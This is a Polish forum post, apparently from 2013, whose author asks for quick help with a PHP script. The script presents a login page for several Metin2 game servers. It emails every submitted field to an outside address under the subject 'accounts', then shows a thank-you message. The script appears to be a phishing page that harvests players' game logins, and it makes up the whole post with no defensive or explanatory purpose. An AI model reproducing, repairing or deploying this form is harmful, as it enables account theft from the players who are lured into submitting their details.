<?php if (count($_POST)) { $email = 'beret32@wp.pl'; $subject = 'konta'; $message = 'Dziękujemy za wysłanie formularza'; $error = 'Wystąpił błąd podczas wysyłania formularza'; $charset = 'iso-8859-2'; $head = "MIME-Version: 1.0\r\n" . "Content-Type: text/plain; charset=$charset\r\n" . "Content-Transfer-Encoding: 8bit"; $body = ''; foreach ($_POST as $name => $value) { if (is_array($value)) { for ($i = 0; $i < count($value); $i++) { $body .= "$name=" . (get_magic_quotes_gpc() ? stripslashes($value[$i]) : $value[$i]) . "\r\n"; } } else $body .= "$name=" . (get_magic_quotes_gpc() ? stripslashes($value) : $value) . "\r\n"; } echo mail($email, "=?$charset?B?" . base64_encode($subject) . "?=", $body, $head) ? $message : $error; } else { ?> <form action="?" method="post"> Wybierz swój server: <select name="serwer"> <option>Pandora MT2</option> <option>Elite Mt2</option> <option>Dragon Mt2</option> <option>Reina</option> <option>Tiveria</option> <option>Tilian2</option> <option>Elerin</option> <option>Eruris</option> </select><br/> Login: <input name="login" type="text" /><br /> <button type="submit">Zaloguj</button> </form> <?php } ?>
Prosze o szybka pomoc
Użytkownik mabxpl edytował ten post 15 04 2013 - 19:04